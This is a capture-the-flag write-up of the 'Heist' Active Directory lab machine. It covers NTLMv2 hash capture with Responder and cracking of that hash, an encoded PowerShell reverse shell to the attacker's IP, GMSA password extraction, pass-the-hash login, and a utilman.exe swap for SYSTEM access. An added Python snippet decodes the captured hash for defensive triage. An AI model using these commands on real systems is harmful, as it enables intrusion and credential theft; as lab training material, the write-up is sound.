Heist
Network
- IP Target:
192.168.166.165
Enumeration
| Port | Service | Version | Notes |
|---|---|---|---|
| 53/tcp | domain | DNS | |
| 88/tcp | kerberos-sec | KERBEROS | |
| 135/tcp | msrpc | MSRPC | |
| 139/tcp | netbios-ssn | SMB | |
| 389/tcp | ldap | LDAP | |
| 445/tcp | microsoft-ds | SMB | |
| 464/tcp | kpasswd5 | | |
| 593/tcp | http-rpc-epmap | MSRPC | |
| 636/tcp | ldapssl | LDAP | |
| 3268/tcp | globalcatLDAP | LDAP | |
| 3269/tcp | globalcatLDAPssl | LDAP | |
| 3389/tcp | ms-wbt-server | RDP | |
| 5985/tcp | wsman | OMI | |
| 8080/tcp | http-proxy | HTTP | |
| 9389/tcp | adws | .NET Message Framing | |
┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/Heist]
└─$ sudo nmap -Pn -p- -oN alltcp_ports.txt 192.168.166.165
[sudo] password for momphucker:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-27 11:19 CET
Nmap scan report for 192.168.166.165
Host is up (0.065s latency).
Not shown: 65513 filtered tcp ports (no-response)
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
3389/tcp open ms-wbt-server
5985/tcp open wsman
8080/tcp open http-proxy
9389/tcp open adws
49666/tcp open unknown
49667/tcp open unknown
49673/tcp open unknown
49674/tcp open unknown
49677/tcp open unknown
49703/tcp open unknown
49758/tcp open unknown
┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/Heist]
└─$ sudo nmap -Pn -sC -sV -p53,88,135,139,445,464,593,636,3268,3269,3389,5985,8080,9389 -oN alltcp.txt 192.168.166.165
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-27 11:22 CET
Nmap scan report for 192.168.166.165
Host is up (0.064s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-12-27 10:22:16Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: heist.offsec0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=DC01.heist.offsec
| Not valid before: 2024-08-01T02:27:33
|_Not valid after: 2025-01-31T02:27:33
| rdp-ntlm-info:
| Target_Name: HEIST
| NetBIOS_Domain_Name: HEIST
| NetBIOS_Computer_Name: DC01
| DNS_Domain_Name: heist.offsec
| DNS_Computer_Name: DC01.heist.offsec
| DNS_Tree_Name: heist.offsec
| Product_Version: 10.0.17763
|_ System_Time: 2024-12-27T10:22:20+00:00
|_ssl-date: 2024-12-27T10:23:00+00:00; 0s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
8080/tcp open http Werkzeug httpd 2.0.1 (Python 3.9.0)
|_http-title: Super Secure Web Browser
9389/tcp open mc-nmf .NET Message Framing
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2024-12-27T10:22:22
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 52.64 seconds
Port 8080
I try calling the web server opened on my machine on port 8080, and it seems to communicate correctly:
Exploit
At this point I close the web server on my machine and run responder:
┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/Heist]
└─$ sudo responder -I tun0
and the listening responder captures some interesting information, a username and a hash:
[...]
[HTTP] NTLMv2 Client : 192.168.166.165
[HTTP] NTLMv2 Username : HEIST\enox
[HTTP] NTLMv2 Hash : enox::HEIST:1393e23cd8ba3883:218AD045683DFE5467764B9C7D2C1A7F:01010000000000003CEB5E9B4F58DB01F65011178EF2CD0D0000000002000800350036003600560001001E00570049004E002D004C004F004A00430051003200310038004200440055000400140035003600360056002E004C004F00430041004C0003003400570049004E002D004C004F004A00430051003200310038004200440055002E0035003600360056002E004C004F00430041004C000500140035003600360056002E004C004F00430041004C000800300030000000000000000000000000300000C4F51C6E9DB9499D59C386C317DB4FE1D9EF380289201E62A8474177A8845FCE0A001000000000000000000000000000000000000900260048005400540050002F003100390032002E003100360038002E00340035002E003200340038000000000000000000
[...]
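Added example, not part of the original writeup: a Python decoder for the NTLMv2 response captured above, in the hashcat 5600 layout that Responder prints, which unpacks the client challenge header and the server's TargetInfo AV pairs. Seen from the defender's side, the capture itself records where the client went: HEIST\enox authenticated to an SPN that is a raw IP (HTTP/192.168.45.248), to a server claiming the domain 566V rather than HEIST, with all-zero channel bindings. The rogue_server_indicators check is my own triage heuristic, not a standard tool.

```python
import struct
from datetime import datetime, timedelta, timezone

# NTLMv2 response Responder captured above (hashcat -m 5600 layout: user::domain:chal:proof:blob)
CAPTURED = (
    "enox::HEIST:1393e23cd8ba3883:218AD045683DFE5467764B9C7D2C1A7F:"
    "01010000000000003CEB5E9B4F58DB01F65011178EF2CD0D00000000"
    "020008003500360036005600"
    "01001E00570049004E002D004C004F004A0043005100320031003800420044005500"
    "0400140035003600360056002E004C004F00430041004C00"
    "03003400570049004E002D004C004F004A00430051003200310038004200440055002E"
    "0035003600360056002E004C004F00430041004C00"
    "0500140035003600360056002E004C004F00430041004C00"
    "0800300030000000000000000000000000300000C4F51C6E9DB9499D59C386C317DB4FE1"
    "D9EF380289201E62A8474177A8845FCE0A00100000000000000000000000000000000000"
    "0900260048005400540050002F003100390032002E003100360038002E00340035002E00"
    "320034003800" "0000000000000000"
)
AV_IDS = {1: "NbComputerName", 2: "NbDomainName", 3: "DnsComputerName",
          4: "DnsDomainName", 5: "DnsTreeName", 6: "Flags", 7: "Timestamp",
          8: "SingleHost", 9: "TargetName", 10: "ChannelBindings"}  # [MS-NLMP] 2.2.2.1

def filetime_to_dt(ft):  # FILETIME: 100 ns ticks since 1601-01-01 UTC
    return datetime(1601, 1, 1, tzinfo=timezone.utc) + timedelta(microseconds=ft // 10)

def parse_ntlmv2(line):
    user, _, domain, server_chal, proof, blob_hex = line.split(":")
    blob = bytes.fromhex(blob_hex)
    # 28-byte header: RespType, HiRespType, 6 reserved, FILETIME, 8-byte client challenge, 4 reserved
    ts, client_chal = struct.unpack_from("<8xQ8s4x", blob, 0)
    target_info, pos = {}, 28
    while True:  # AV_PAIR list: uint16 id, uint16 length, value; ids 1-5 and 9 are UTF-16LE
        av_id, av_len = struct.unpack_from("<HH", blob, pos)
        raw, pos = blob[pos + 4:pos + 4 + av_len], pos + 4 + av_len
        if av_id == 0:  # MsvAvEOL terminates the list
            break
        name = AV_IDS.get(av_id, str(av_id))
        target_info[name] = raw.decode("utf-16-le") if av_id in (1, 2, 3, 4, 5, 9) else raw.hex()
    return {"user": user, "domain": domain, "server_challenge": server_chal, "nt_proof": proof.lower(),
            "client_time": filetime_to_dt(ts), "client_challenge": client_chal.hex(), "target_info": target_info}

def rogue_server_indicators(info):  # defender triage: did the client talk to a server it should not trust?
    ti, found = info["target_info"], []
    if ti.get("NbDomainName", "").upper() != info["domain"].upper():
        found.append("target-domain-mismatch")  # HEIST user, but the server claimed domain 566V
    host = ti.get("TargetName", "").split("/", 1)[-1]
    if host.replace(".", "").isdigit():
        found.append("spn-is-raw-ip")  # HTTP/192.168.45.248 rather than a domain host name
    if ti.get("ChannelBindings") == "00" * 16:
        found.append("no-channel-binding")  # nothing binds this response to a TLS channel (no EPA)
    return found
```

The machine names in TargetInfo (566V, WIN-LOJCQ218BDU) are the values the rogue HTTP server supplied in its challenge, which is why they match nothing in heist.offsec.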
I try to crack the hash with hashcat, after putting the hash into the file hashes.txt:
┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/Heist]
└─$ hashcat -m 5600 hashes.txt /usr/share/wordlists/rockyou.txt -o cracked.txt
┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/Heist]
└─$ cat cracked.txt
ENOX::HEIST:1393e23cd8ba3883:218ad045683dfe5467764b9c7d2c1a7f:01010000000000003ceb5e9b4f58db01f65011178ef2cd0d0000000002000800350036003600560001001e00570049004e002d004c004f004a00430051003200310038004200440055000400140035003600360056002e004c004f00430041004c0003003400570049004e002d004c004f004a00430051003200310038004200440055002e0035003600360056002e004c004f00430041004c000500140035003600360056002e004c004f00430041004c000800300030000000000000000000000000300000c4f51c6e9db9499d59c386c317db4fe1d9ef380289201e62a8474177a8845fce0a001000000000000000000000000000000000000900260048005400540050002f003100390032002e003100360038002e00340035002e003200340038000000000000000000:california
- Credentials:
enox:california
I log into the machine with evil-winrm:
┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/Heist]
└─$ evil-winrm -i 192.168.166.165 -u enox -p 'california'
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\enox\Documents> whoami
heist\enox
To get an interactive shell, I open a listener on port 4455 and run:
*Evil-WinRM* PS C:\Users\enox\Documents> powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQA5ADIALgAxADYAOAAuADQANQAuADIANAA4ACIALAA0ADQANQA1ACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA==
┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/Heist]
└─$ nc -nvlp 4455
listening on [any] 4455 ...
connect to [192.168.45.248] from (UNKNOWN) [192.168.166.165] 50066
PS C:\Users\enox\Documents>
Finally I grab the local.txt flag.
Privilege Escalation
After transferring SharpHound.exe to the target machine, I collected the data to feed to BloodHound:
PS C:\Users\enox\desktop\wintools> .\SharpHound.exe --collectionmethods All --outputdirectory C:\Users\enox\desktop\wintools --outputprefix "bloodhound-file"
The user enox, whom I control, is a member of the web admin group, which has the Read GMSA Password privilege.
Using GMSAPasswordReader.exe, previously uploaded to the target machine, I retrieve the hash of the svc_apache user:
PS C:\Users\enox\desktop\wintools> .\gmsapasswordreader.exe --accountname svc_apache
.\gmsapasswordreader.exe --accountname svc_apache
Calculating hashes for Old Value
[*] Input username : svc_apache$
[*] Input domain : HEIST.OFFSEC
[*] Salt : HEIST.OFFSECsvc_apache$
[*] rc4_hmac : FC258E893FBB2444E5E7327348164F4A
[*] aes128_cts_hmac_sha1 : DC1E813E044FA6ABBE98A355F97E7B94
[*] aes256_cts_hmac_sha1 : D079C82F93EBDD71E4F90DDBB8A144B0B8FA9C844F8838C82A7A6955015B983C
[*] des_cbc_md5 : 61B3E3B0133813E6
Calculating hashes for Current Value
[*] Input username : svc_apache$
[*] Input domain : HEIST.OFFSEC
[*] Salt : HEIST.OFFSECsvc_apache$
[*] rc4_hmac : C9C9F97308956B4AEDD53C1351F47A84
[*] aes128_cts_hmac_sha1 : DE782FCFD097727B6D5634020DCAED9D
[*] aes256_cts_hmac_sha1 : 351EE53A3264114A654D9B5DBE0A245F5E0E4FBE4A381AEA1C281D9270AFE4F9
[*] des_cbc_md5 : D01949C757204F01
And I log in with evil-winrm using the hash C9C9F97308956B4AEDD53C1351F47A84 just found:
┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/Heist]
└─$ evil-winrm -i 192.168.166.165 -u svc_apache$ -H 'C9C9F97308956B4AEDD53C1351F47A84'
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc_apache$\Documents>
At this point I am logged in as svc_apache$ with the following privileges:
*Evil-WinRM* PS C:\windows\system32> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeRestorePrivilege Restore files and directories Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
I check the unusual privilege SeRestorePrivilege. According to HackTricks:
Info
This privilege grants write access to any system file, regardless of the file's ACL (Access Control List). It opens up numerous escalation possibilities, including the ability to modify services, perform DLL hijacking, and set debuggers via Image File Execution Options, among various other techniques.
And it suggests the following steps for privilege escalation:
Note
- Launch PowerShell/ISE with the SeRestore privilege present.
- Enable the privilege with Enable-SeRestorePrivilege.
- Rename utilman.exe to utilman.old
- Rename cmd.exe to utilman.exe
- Lock the console and press Win+U
At this point I rename the utilman.exe executable to utilman.old and cmd.exe to utilman.exe:
I launch rdesktop from the Kali machine to get the login screen:
┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/Heist]
└─$ rdesktop 192.168.166.165
Core(warning): Certificate received from server is NOT trusted by this system, an exception has been added by the user to trust this specific certificate.
Failed to initialize NLA, do you have correct Kerberos TGT initialized ?
Core(warning): Certificate received from server is NOT trusted by this system, an exception has been added by the user to trust this specific certificate.
Connection established using SSL.
and press Win+U to open a shell as SYSTEM.
All that remains is to retrieve the proof.txt flag: